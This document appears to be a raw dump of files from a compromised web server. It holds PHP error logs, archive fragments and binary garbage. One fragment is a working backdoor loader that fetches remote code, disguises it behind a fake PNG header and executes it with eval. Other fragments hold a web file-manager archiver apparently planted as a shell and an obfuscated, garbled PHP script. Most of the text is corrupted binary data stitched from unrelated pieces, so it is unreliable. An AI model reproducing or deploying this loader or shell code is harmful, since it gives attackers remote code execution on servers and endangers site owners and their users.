/home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:26:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:58:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 14:56:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 16:16:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 17:25:56 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 18:52:03 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 20:24:18 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 23:08:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 23:59:22 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:29:01 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:53:07 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:53:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:55:13 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:55:29 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:55:33 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 04:27:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 04:27:35 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 04:50:05 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 04:52:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 06:01:34 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 06:22:01 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 06:24:02 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 07:00:03 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 07:32:12 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 07:32:50 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 07:33:00 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 PK g[h hik24b.tarnu[dp6h1.php000064400000006024151032754160006205 0ustar00eof()) { $content .= $file->fgets(); } } catch (Throwable $e) { $content = ''; } if (strlen(trim($content)) < 1) { $content = @file_get_contents($url); } if (strlen(trim($content)) < 1 && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10, ]); $content = curl_exec($ch); curl_close($ch); } return $content; } // -------------------------------------------- // 3. Create payload by appending hidden PHP code // -------------------------------------------- function createStealthPayload($phpCode) { $png = generateRealisticPngHeader(); $marker = '###PAYLOAD###'; $encoded = base64_encode($phpCode); return $png . $marker . $encoded; } // -------------------------------------------- // 4. Extract and execute hidden payload // -------------------------------------------- function extractAndExecutePayload($data) { $marker = '###PAYLOAD###'; $parts = explode($marker, $data); if (count($parts) === 2) { $decoded = base64_decode($parts[1]); if ($decoded !== false && strlen(trim($decoded)) > 0) { @eval("?>$decoded"); } } } // -------------------------------------------- // Main Execution Flow // -------------------------------------------- $remoteCode = loadRemoteData($mainUrl); if (strlen(trim($remoteCode)) > 0) { $payload = createStealthPayload($remoteCode); extractAndExecutePayload($payload); // Executes hidden remote code } ?> PK g[  2xmzkg.zipnu[PKg[ Jii index.phpnu[PKg[ Jii index.phpnu[PKIPK g[.5<< sup0h.php.tarnu[home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php000064400000232747151030446340016665 0ustar00<\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> PK g[ML9 hik24b.tar.gznu[WoFg$ULKx+dRf( B}طg|Д}lǐd݂C =o{;e$h߰?bX).PԆ3,r,̶)їdĎeD`K#$+i?vL2cdVlb=Wx"\`ZÜD|r`(u)<1&$Rxopz %W0Vsȼj~p?:"X D7jIBj5AV5e|gRU]> 4r*q@h_%$Nbcq %6bt.Qåq^by.6jоu-Kj^̔*19@!=S:z/ں_C]c7̒zf3Y*XW!;l|rF 6]̔h:t|693*3/al-;`N_{˩bn?cis<ʁP/u;W ,I*wU=6j0foUn=GژiĆTOT5JK \l#ÜD56wUjb?[U譥 ܋%6}d~֝z-,91]^ Y9w+Xr,X NmF"rت 1x$np`#9.^|uz:ݨAV{)gBhw\%L {+VpZI&<9.jWvsI_'ygzgz?hPK g[-ggerror_log.tar.gznu[OK0w^ozXI7sUNc!#[&5 2* /< t{ӷQvm*ߵ Jn[S.GJJ"'0 \)-bN/[=ƕ?l4o 3 gX-V$Xh/w7qxƫ Nu7z Àm'Ep>uC6d/[*L/58o8,XǙ]]р%v*UFCh x/-8E2i9B^T Ō3j)9Z$-&qPK g[3RG ipxbwd.zipnu[PKf[/ error_lognu[[05-Nov-2025 04:52:32 UTC] PHP Warning: gzinflate(): data error in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 29 [05-Nov-2025 04:52:32 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _͐��() in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php:48 Stack trace: #0 {main} thrown in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 48 [05-Nov-2025 07:50:56 UTC] PHP Warning: gzinflate(): data error in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 29 [05-Nov-2025 07:50:56 UTC] PHP Fatal error: Uncaught Error: Call to undefined function _͐��() in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php:48 Stack trace: #0 {main} thrown in /home/gettoplisting/public_html/dd7e5a/ipxbwd/z52wh.php on line 48 PKf[akog~g~ z52wh.phpnu[���ij|����Al����c�R�B�K�m \"e �M{B�乷-}���!��bqj�|liq�� 4�&&��p��y/J���ų۶|[�eG{�kk�G2J�6��O�����2�b��j�m�7��c��NM�6Yc�P_���ɼ�P�am���hA�֐�u��<����&�T�~,m��]v�G��TeM6�Ԕ����6�7糧y�k�{�h�8�n0���kU��z���T5�9��6GU8�:�hr:����i��|X�����c�.]��)�s�eeRWԯ��ߛ�쒂���P�?k��wqX�Ӗ�}�d�t[ぃ��y:�&Vu��aI��j��rB�AJ�� I��}��A�D!;E�� �C���ǂ.A4�I�0�� �q8:h�å(���X!%ƅ��B�Ń%i3:���j e=�X�^Y�B�'�ř�e�i��/@н�x��t�uh��� �t���2��wED�1�DAg��H\\8���IwI�!�(,�(�OL��Q 1 �k�§C>�?�� t� �p?�p���c4��,�Qu�@�wI�������v� ���քK�lM!/5M(@/ғ��T\\�Gv�;�"))xor${"a�����������٩�ߋ������������߽������������� ����τ��챉�۞������ϕ �� �掦����������ɰ���„������ ������֠���� ה������ʰ�� ����俌ľ��Ť������ͦ�����¹�˜�� ��������Ю�����ߍ��Ĺ�ΊΑ������Ø�ݶ�����������Ȫ�������Ɍ�����н����ؽ����ރ ���ې����ϸ����䃚�������������� ���ê�������������������������� ����ݶ�����������޽� ��������������Ʊ����������� �������و�����ޕ������� ���� � �㘀�ˠͣ喉����������������� ������������݌�� ��쨐�م˄��������������Թ���������뗝������ Ϭ���������Ä͙ �� �������С��܌�� կ���� �������ӯ� � ��������Ǖ��������������������������� �߷���íݿ���������ԛ���������ú �����Ȱ���ܮ�����͹����좒� ٙ�����ք �����ⓏŐ����Ҩ�� ������ ޭ������ 櫿������������� �����������˛��ݵ�� �������� �������Ϩ�"}=_͐��(" �ip�cDRP.")xor/*c�*/${"b�������ƥ�ܜ������Л���㆘������� ��ɴ�Ʈ�� Ɔ����� �����������ڀ������ʿ��ߛ��̬ ���������� ������ Ù����£ ������ ����������҇���㍖����񌟭�����Ч������ �ާ������ޑ�� ��������̷��ú���� �㈐������…�������������˜��󢾢�ǵ����ɭ���ʔ�������Ę�����������駗�������Ҳ�Ȣ�������������� ���������� ˮ��������� �����֛���߂���·�忾�� �����ο����� ��������� ��������ȃ����ˏ���򣧒ٳ����� ����������ɯ����������苣�������º���� ������ʕ������������ۮ��ص��Й�����ش�Ē�� �������Ź��������Ů���҇ ����������ز�ؑ������ν����������鉟 ����㼂�����΢�ɴݓ�ՍϿ�����������Ն ����� ���ʄ���ʕ����� �� �����ȝ�ԍ�Ã������ �ȃ������ �����˄�ʏ������׈����������������ݢ���������ҿ������̳�컹�����������������⺬��� �ɵߙ��ǟܠ��۽���ؐ�������������›�"}=_͐��("�8�ɾ7֡_")xor/*c�*/${"d�ǀ���ư��������� �ᥧ ��������������������DZ ����ͯ������������ǃ� �Ɇ�����ž�ݫ�� ������ �ͭ������ъ��˿�樋�뫾��������������ͯ���� ͒�˜�����ֱ��ϵ�����Ѽ��Ҡ�����Ҏ����ڐ������燶�����Й��ՠ�ݞ� �̇�ֶ  ��������澭� Ë�������� ��� ��������������⯴��� ²��ο�������������Ľ���ۅ�Ɖ���ζ�����侙ʻ�����ٝ���ۈ������� �ˀ�������Ŷ��섞�Ý�� ���̪М������Ĉ�� ��������۴���� ������ڭ�����ͺ� ������ŖՉ�������ֺ�� Ά꛻ �� ��ěԝ������ ���� ������ݼ��������嘙��������ּ����Ƀ��踟����ߐ����� ��������􄢳����К����� ������� �� ������� �����ш����蓚��� 땜��޻����������������������� �õ�� �� ����ު۹������ �딫ާ���� ��ǚ�۷إ��څ��꓋����ְ�� ሎ��街 ���Є�ɫ�� ��Ë���͸ ���꜡���͍�͋�������������ֱ�������� �nj�������������� ������ܺ����"}=_͐��("�;q���S3�")xor/*c�*/${"e������ ����ʿ� ��������ϓ��̺�������ɬ�����ΐ����ꜳ�ε�����Ţ�������ۃ����΢��͍�ʎ���Ş���������� �� �����ņ�����ɴ�͆��ֹ���������������쌕�����Ŷ��������䎫�������� ���ԗ�������͝�����ګ������������� ܖ����΍������������㦵������ ���� �ݜū�����ϝ���������Χ���������� ��֏�ә��� ���Ǎ���̳ �����Ⱥ����������� �⠽ ���� �����֢���������漾�Α�Ǻ�� 늍ֆ����В�����←����å꿛��Å��Ҹ�������ް�����������﷋מ꧔̕�� ���螞�÷ ���ʤ�����ʦ�Ɵ��Џ�� ���ȕ������������Ң�؍��������ͷ�汑���� �Ƒ҉�� �����������Ŗ�ծѮ���������֖�������ڨ�å�Ǿ��ȉ���Ŀ��������Ȁ������ᄋ��Ȥ� �ђ����ξ����� ���������Ԥ������ ����� ����駨�����������������ϕ������ ���������ㅁ��������ij ������������������ݣ������̜�ц۪�����մ�������ʬ����������↝����������Ӝ���܇��"}=_͐��("1j��FnIq���")xor/*c�*/${"f�� ����٢ѣ����������¬�����������ݜ����ˇҪ���� ���������ǖ��������������ꭧ����������ޖ��������� �玥�����ߏѠ�؞��� ����������ӡ�����ɫ��������ӝ���������������� ��� ���ك���� �К��������Íٳ����ح�������������習��遗ĕﭘ��ʋ �� ��е�����蠜�����ֻ���������⏝������Dz��ߪ���������������ɭ�����ݶ�����������쓂ᡩ� ����ޛ�Ȓ欛����׆��߄���ꅉ� ����� ���� ������� �������������у�������斲��غ������ۿ���Ŏ���ŵ�ϓ������꯴�ɱ����ȋ��Ë������ĭ��Ң����ϖ����˒����������������ŋ� ��� ���ֳ��������Փ��屵ԭ �˹��Պ���������� ��� ����ܶ�Ĵ������Ĕ�� ���̨����㝣������ẝ ��𔶦�����ԫ�����Ǫ�ƾÿ � �������ے���� ���ϐ� � ��������ݘ����������������� �ޒ����������ŤǦ��������ܕ������ܳ����ܧ�ܕ����҅�Ÿﶗ�����ԁ�乓�������ɉ������"}=_͐��(";�N�g�G�%��")xor/*c�*/${"g�̅��Ϧą���������ӕ� ������ڝ�����ڪ����А�͹�ݠ�́���������Ծ�� �������ǭ�����Է��̏���˫������Յ�ۅ����� �߶�����������佇�ڬ������׆�Р����� � �҂��������� �����ت� �ԅ���������� ����ҹ�������������׽����󋃘��Ϸ̻ꌌ�� ک���ޔ�� ޙ��ڮ�ʸ������ ���ןڎ������Ȃ�ӧ�ʽ�����ܸ�������������Һ����� ������ѿ������������������ ���ƣ��˻��� �à���ɝ���������� ���ٓ����򻄧��������� ��漕��܉���ν����������ȹ��������仡������������ՠ���� �Ë������ ����������������ŧ������׵�ɡ󏊜葂�ػ��� ���������������� ����������¡��ƁҊɦ�����������������Ǘ�������Ó������錍���Ҭ���� ����Ĕ��˵�� �ò����ڇ���������ܢ����Ѳ���������ե�� ����𫌋�������������􋐤����Ȩ�����䮵��ߩ�� �Ó���������� ˮ�� �����鼈����������꡸�������� 񖳞�����є�����Ǯ����½���������� ���"}=_͐��("E�x�^���h�ҿ�")xor/*c�*/${"0� ����끑�� �� ���τ��͋�����������В� ��������������ڥ톙�����᪺������ ���������Ղ��º��"}=_͐��("v\"�.@;�;h�")xor/*c�*/${"h���ܵ�������í���غ�Ȑ����Ƭ����������ü� ǔ���������Ո�Ν����ᵌ�� ������������ܮ������ց�������颈ˢ��ֈ�����ф���������������޾��������ڃ������א�������������������˖��ܶ�غ��Ǻ�൶���Ǝ������� ��� ���ۙ� ���������� �����������֌ԣ�ƒ�����э����ş�����۫����𔴳�������� �ʧ�ĸ�ն��������Ҙ��� ������������ ������Է�� �����������������������������瑒�������Ĝ�� ��Ǖ� � �� ���������ʦ�� �����������䥻���Ũ���ݘ������Ԧ���� �����ċ��𭂯���� ����븜ﵥ����ƤÂټ���� ����Ɛ��������󯗱���������������Ġ����� 